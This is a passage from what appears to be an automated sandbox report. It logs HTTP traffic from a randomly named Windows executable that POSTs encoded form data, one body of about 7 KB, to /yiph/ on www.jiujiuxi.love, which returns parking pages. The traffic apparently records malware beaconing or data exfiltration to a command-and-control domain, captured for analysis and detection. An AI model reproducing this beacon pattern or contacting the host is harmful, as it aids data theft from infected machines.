                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?mRu=Tgs0l5rQdINE0HmohrfgPmtVT9TM6mRmz28qlq5N+W6TIOOkclTpEHygPFllR64ZyPP4U6P7xjaKPMS0ZS1/tTAw9ro2DSZN0V3b+mDHt47uSUTeFI2WDZw=&UJ=7H1XM"}</script></head></html>


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            45192.168.11.2049764199.59.243.227802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:32:39.359334946 CET750OUTPOST /yiph/ HTTP/1.1
                                                                                                                            Host: www.jiujiuxi.love
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.jiujiuxi.love
                                                                                                                            Referer: http://www.jiujiuxi.love/yiph/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 200
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 47 6d 79 46 50 54 6e 4c 4b 75 62 74 30 70 57 53 6e 72 46 34 72 47 51 78 38 6d 36 52 41 70 54 42 42 73 46 42 55 6b 6e 2b 53 4d 68 45 6e 6b 59 4e 4c 42 75 64 52 78 4b 6c 4a 37 38 67 62 62 59 42 62 69 5a 4d 67 39 35 5a 49 6d 49 4a 31 58 2b 61 52 55 72 58 34 5a 59 31 45 79 54 6c 50 36 69 6b 68 4a 33 53 5a 6c 73 71 33 63 6a 33 70 63 39 57 71 4e 4f 53 6e 56 74 63 6d 2b 59 6a 41 70 31 33 4c 42 65 70 44 69 54 67 34 6d 52 48 62 67 55 71 4c 35 33 49 57 48 6e 62 56 2f 48 68 7a 41 77 56 64 64 75 66 7a 53 2b 63 75 6f 55 2b 64 73 41 34 6d 53 30 47 49 38 52 59 37 70 71 34 36 49 78 54 51 51 3d 3d
                                                                                                                            Data Ascii: mRu=GmyFPTnLKubt0pWSnrF4rGQx8m6RApTBBsFBUkn+SMhEnkYNLBudRxKlJ78gbbYBbiZMg95ZImIJ1X+aRUrX4ZY1EyTlP6ikhJ3SZlsq3cj3pc9WqNOSnVtcm+YjAp13LBepDiTg4mRHbgUqL53IWHnbV/HhzAwVddufzS+cuoU+dsA4mS0GI8RY7pq46IxTQQ==
                                                                                                                            Nov 12, 2024 15:32:39.496306896 CET1289INHTTP/1.1 200 OK
                                                                                                                            date: Tue, 12 Nov 2024 14:32:39 GMT
                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                            content-length: 1122
                                                                                                                            x-request-id: 094f4ea0-efda-4a15-a941-04a790237e85
                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_dR3uFZjywEejXOIhQ7eWsZeY5fJvXgqpOBC/iGFyhdJSq59BZaviIPzBrJ8UFdKDsWnhk7NaznU86I06sj6biw==
                                                                                                                            set-cookie: parking_session=094f4ea0-efda-4a15-a941-04a790237e85; expires=Tue, 12 Nov 2024 14:47:39 GMT; path=/
                                                                                                                            connection: close
                                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 64 52 33 75 46 5a 6a 79 77 45 65 6a 58 4f 49 68 51 37 65 57 73 5a 65 59 35 66 4a 76 58 67 71 70 4f 42 43 2f 69 47 46 79 68 64 4a 53 71 35 39 42 5a 61 76 69 49 50 7a 42 72 4a 38 55 46 64 4b 44 73 57 6e 68 6b 37 4e 61 7a 6e 55 38 36 49 30 36 73 6a 36 62 69 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_dR3uFZjywEejXOIhQ7eWsZeY5fJvXgqpOBC/iGFyhdJSq59BZaviIPzBrJ8UFdKDsWnhk7NaznU86I06sj6biw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                                                            Nov 12, 2024 15:32:39.496356964 CET522INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                                                                                            Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMDk0ZjRlYTAtZWZkYS00YTE1LWE5NDEtMDRhNzkwMjM3ZTg1IiwicGFnZV90aW1lIjoxNzMxNDIxOTU5LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuaml1aml1eGkubG92ZS9


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            46192.168.11.2049765199.59.243.227802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:32:42.036447048 CET770OUTPOST /yiph/ HTTP/1.1
                                                                                                                            Host: www.jiujiuxi.love
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.jiujiuxi.love
                                                                                                                            Referer: http://www.jiujiuxi.love/yiph/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 220
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 47 6d 79 46 50 54 6e 4c 4b 75 62 74 32 49 6d 53 71 71 46 34 6a 47 51 79 35 6d 36 52 4f 4a 54 2f 42 73 35 42 55 68 44 75 4f 70 35 45 6d 47 41 4e 4b 46 36 64 63 52 4b 6c 47 62 38 66 66 62 59 49 62 69 6c 45 67 38 46 5a 49 6d 30 4a 31 57 75 61 53 69 6a 59 71 35 59 7a 4e 53 54 37 53 71 69 6b 68 4a 33 53 5a 6c 35 4e 33 63 4c 33 70 76 6c 57 71 73 4f 52 6b 56 74 64 76 65 59 6a 45 70 31 7a 4c 42 65 50 44 6a 50 5a 34 6b 70 48 62 68 6b 71 4c 74 72 48 63 48 6e 64 59 66 47 6f 79 54 46 4b 44 70 43 71 31 56 43 36 68 49 73 6c 63 36 4e 69 37 67 41 69 4c 76 4e 71 2f 5a 54 51 34 4b 77 49 4e 55 45 64 33 49 76 6d 7a 2b 2b 46 38 4d 48 61 63 6e 4a 50 6d 4e 30 3d
                                                                                                                            Data Ascii: mRu=GmyFPTnLKubt2ImSqqF4jGQy5m6ROJT/Bs5BUhDuOp5EmGANKF6dcRKlGb8ffbYIbilEg8FZIm0J1WuaSijYq5YzNST7SqikhJ3SZl5N3cL3pvlWqsORkVtdveYjEp1zLBePDjPZ4kpHbhkqLtrHcHndYfGoyTFKDpCq1VC6hIslc6Ni7gAiLvNq/ZTQ4KwINUEd3Ivmz++F8MHacnJPmN0=
                                                                                                                            Nov 12, 2024 15:32:42.173759937 CET1289INHTTP/1.1 200 OK
                                                                                                                            date: Tue, 12 Nov 2024 14:32:41 GMT
                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                            content-length: 1122
                                                                                                                            x-request-id: ab15c325-3746-4e1e-932b-ba09846e4b88
                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_dR3uFZjywEejXOIhQ7eWsZeY5fJvXgqpOBC/iGFyhdJSq59BZaviIPzBrJ8UFdKDsWnhk7NaznU86I06sj6biw==
                                                                                                                            set-cookie: parking_session=ab15c325-3746-4e1e-932b-ba09846e4b88; expires=Tue, 12 Nov 2024 14:47:42 GMT; path=/
                                                                                                                            connection: close
                                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 64 52 33 75 46 5a 6a 79 77 45 65 6a 58 4f 49 68 51 37 65 57 73 5a 65 59 35 66 4a 76 58 67 71 70 4f 42 43 2f 69 47 46 79 68 64 4a 53 71 35 39 42 5a 61 76 69 49 50 7a 42 72 4a 38 55 46 64 4b 44 73 57 6e 68 6b 37 4e 61 7a 6e 55 38 36 49 30 36 73 6a 36 62 69 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_dR3uFZjywEejXOIhQ7eWsZeY5fJvXgqpOBC/iGFyhdJSq59BZaviIPzBrJ8UFdKDsWnhk7NaznU86I06sj6biw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                                                            Nov 12, 2024 15:32:42.173819065 CET522INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                                                                                            Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYWIxNWMzMjUtMzc0Ni00ZTFlLTkzMmItYmEwOTg0NmU0Yjg4IiwicGFnZV90aW1lIjoxNzMxNDIxOTYyLCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuaml1aml1eGkubG92ZS9


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            47192.168.11.2049766199.59.243.227802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:32:44.689193010 CET2578OUTPOST /yiph/ HTTP/1.1
                                                                                                                            Host: www.jiujiuxi.love
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Origin: http://www.jiujiuxi.love
                                                                                                                            Referer: http://www.jiujiuxi.love/yiph/
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            Content-Length: 7368
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: max-age=0
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Data Raw: 6d 52 75 3d 47 6d 79 46 50 54 6e 4c 4b 75 62 74 32 49 6d 53 71 71 46 34 6a 47 51 79 35 6d 36 52 4f 4a 54 2f 42 73 35 42 55 68 44 75 4f 70 78 45 6e 7a 63 4e 4c 69 47 64 64 52 4b 6c 59 4c 38 61 66 62 5a 61 62 69 39 41 67 38 4a 6a 49 6a 77 4a 30 32 79 61 54 51 4c 59 7a 4a 59 7a 53 43 54 6d 50 36 69 4c 68 4a 6e 57 5a 6c 70 4e 33 63 4c 33 70 70 68 57 6a 64 4f 52 69 56 74 63 6d 2b 59 6e 41 70 31 4c 4c 43 75 78 44 6a 62 4a 34 55 4a 48 61 42 30 71 59 75 44 48 51 48 6e 66 64 66 47 77 79 54 5a 76 44 74 61 4d 31 56 65 45 68 4c 63 6c 59 75 70 68 6b 43 30 45 52 2f 5a 58 77 62 7a 73 32 35 55 42 4f 54 64 6f 2b 34 4f 49 38 4c 47 6e 31 76 37 79 47 53 56 69 6c 35 47 56 36 49 59 61 6f 54 48 4d 38 44 33 33 31 36 4c 74 7a 79 56 41 52 6e 65 51 39 43 4f 6a 51 44 72 54 4d 71 51 30 6a 79 4a 36 78 38 68 56 30 53 4c 75 63 30 6f 53 79 5a 6e 46 64 69 55 72 48 48 77 30 31 56 52 79 37 54 6c 77 7a 41 45 76 55 64 51 42 55 32 53 45 66 5a 59 58 43 42 47 34 57 67 43 35 66 6b 79 4b 50 35 6a 50 30 4a 4b 4f 62 61 4f 4b 67 68 59 48 4b 48 [TRUNCATED]
                                                                                                                            Data Ascii: mRu=GmyFPTnLKubt2ImSqqF4jGQy5m6ROJT/Bs5BUhDuOpxEnzcNLiGddRKlYL8afbZabi9Ag8JjIjwJ02yaTQLYzJYzSCTmP6iLhJnWZlpN3cL3pphWjdORiVtcm+YnAp1LLCuxDjbJ4UJHaB0qYuDHQHnfdfGwyTZvDtaM1VeEhLclYuphkC0ER/ZXwbzs25UBOTdo+4OI8LGn1v7yGSVil5GV6IYaoTHM8D3316LtzyVARneQ9COjQDrTMqQ0jyJ6x8hV0SLuc0oSyZnFdiUrHHw01VRy7TlwzAEvUdQBU2SEfZYXCBG4WgC5fkyKP5jP0JKObaOKghYHKHsS+nUbbTDSBkISxgIUhe/gXxqoPPJF6eJlxDuZberzROeg/p2e7ZG2y0WALJLNJM4KYpK6FReEafb30ZqhokUCsdQcUVkuEAiwaDH1J4GCkGWZgzu/OpBA9xVUQCC6Wk34BkndbutBB4LuqFkIfcYFIHjYJjSttPiZE/zzqt93VfJ4c6YYjTkTfkGTgoxOzlSFzeSGKqQFkO6uMu0KprLjuzVHFHj9AVIT+KBsilalKXxzxVUusKn72csuBCh8gnAbDHZtlH/CpG/enLKYs7SyJW25g3lp7hfgLC1LC/viop1uQvHSoHXx8yHS8cYAT5Uj9oSTeUasQ3pr9XZjHkYvxmCheGPyKkB0nm6nzmMvnNWESrIt6BisacOO+2b39EYTF0G6NjOsbwCcqVvZQ5WULElFO0JgM0UI39IKmXXesBpfR/q4cJH63L2+WTD/qxadEHnl82iuSWW0zt7GmUuibFXKtQ0v+gRJBglEvIvvRWx/d/EwAF6HAodpKRUHFzpfmHRgjhgxJ3qkUbNO+dvYNrKkj08oJ6ekgz/T1ECUIDSk5yrBwVw0KZbIw9CYG3Ie9RCVK1Pt4Cesaa4rfm8uuJg2PKVw6eBH2+RmfQQdVZ8PxIUCZcCQJvHU/6jQd+PQZN7BKE2ZT8fv8NVHvccAUhqtCDxIsUiq [TRUNCATED]
                                                                                                                            Nov 12, 2024 15:32:44.689294100 CET5341OUTData Raw: 75 6f 79 62 4c 4e 31 44 66 39 77 6f 51 4e 61 54 6f 55 67 45 35 49 4f 50 59 46 39 44 73 61 68 55 74 55 33 66 61 58 69 76 62 36 35 34 76 42 58 31 4c 63 4e 4f 77 79 48 51 74 4d 4f 49 39 58 73 4f 45 33 77 47 43 42 6a 78 51 4e 65 63 39 66 70 33 72 48
                                                                                                                            Data Ascii: uoybLN1Df9woQNaToUgE5IOPYF9DsahUtU3faXivb654vBX1LcNOwyHQtMOI9XsOE3wGCBjxQNec9fp3rHOGP6qy5qXM1qEos2XQsQYj/kLz3wZICbPPfyq3bnsq2A3pRJztlWeVTim3KD0lQpctmpjUGPeQl01Cm61TMJcbIlC8OPqfTPYUh9G83Uj604QQtTcEYQKjynzrwEkOtqino2Iw1jp6+FsF5Y9d4x/v8B5pB0rEOOK
                                                                                                                            Nov 12, 2024 15:32:44.824861050 CET1289INHTTP/1.1 200 OK
                                                                                                                            date: Tue, 12 Nov 2024 14:32:44 GMT
                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                            content-length: 1122
                                                                                                                            x-request-id: aaa8ded0-ace0-4b38-af31-f720829616ab
                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_dR3uFZjywEejXOIhQ7eWsZeY5fJvXgqpOBC/iGFyhdJSq59BZaviIPzBrJ8UFdKDsWnhk7NaznU86I06sj6biw==
                                                                                                                            set-cookie: parking_session=aaa8ded0-ace0-4b38-af31-f720829616ab; expires=Tue, 12 Nov 2024 14:47:44 GMT; path=/
                                                                                                                            connection: close
                                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 64 52 33 75 46 5a 6a 79 77 45 65 6a 58 4f 49 68 51 37 65 57 73 5a 65 59 35 66 4a 76 58 67 71 70 4f 42 43 2f 69 47 46 79 68 64 4a 53 71 35 39 42 5a 61 76 69 49 50 7a 42 72 4a 38 55 46 64 4b 44 73 57 6e 68 6b 37 4e 61 7a 6e 55 38 36 49 30 36 73 6a 36 62 69 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_dR3uFZjywEejXOIhQ7eWsZeY5fJvXgqpOBC/iGFyhdJSq59BZaviIPzBrJ8UFdKDsWnhk7NaznU86I06sj6biw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                                                            Nov 12, 2024 15:32:44.824929953 CET522INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                                                                                            Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYWFhOGRlZDAtYWNlMC00YjM4LWFmMzEtZjcyMDgyOTYxNmFiIiwicGFnZV90aW1lIjoxNzMxNDIxOTY0LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuaml1aml1eGkubG92ZS9


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            48192.168.11.2049767199.59.243.227802832C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:32:47.355833054 CET476OUTGET /yiph/?mRu=LkalMmDuboj4872empR9rFcNrijVZ/XXOKlfHTPEe/ophG0OElyabBCkCoxIRZ4fKVtkhMIDAwIoplbOZBCU2IJMHRXqXMq09ankZnsM2pers/hD+qKFjlc=&UJ=7H1XM HTTP/1.1
                                                                                                                            Host: www.jiujiuxi.love
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Nov 12, 2024 15:32:47.490995884 CET1289INHTTP/1.1 200 OK
                                                                                                                            date: Tue, 12 Nov 2024 14:32:47 GMT
                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                            content-length: 1446
                                                                                                                            x-request-id: 0f9306c1-258e-4093-9abf-15cd0cb267c1
                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_vSCaT957zDST2rkX2szfn4/xrNC8UWuqWKFGoZTCuOliJfJ67MU/vmGvtiR/R7lflHdAl0SAznOJzOHDMCoeLg==
                                                                                                                            set-cookie: parking_session=0f9306c1-258e-4093-9abf-15cd0cb267c1; expires=Tue, 12 Nov 2024 14:47:47 GMT; path=/
                                                                                                                            connection: close
                                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 76 53 43 61 54 39 35 37 7a 44 53 54 32 72 6b 58 32 73 7a 66 6e 34 2f 78 72 4e 43 38 55 57 75 71 57 4b 46 47 6f 5a 54 43 75 4f 6c 69 4a 66 4a 36 37 4d 55 2f 76 6d 47 76 74 69 52 2f 52 37 6c 66 6c 48 64 41 6c 30 53 41 7a 6e 4f 4a 7a 4f 48 44 4d 43 6f 65 4c 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_vSCaT957zDST2rkX2szfn4/xrNC8UWuqWKFGoZTCuOliJfJ67MU/vmGvtiR/R7lflHdAl0SAznOJzOHDMCoeLg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                                                            Nov 12, 2024 15:32:47.491017103 CET846INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
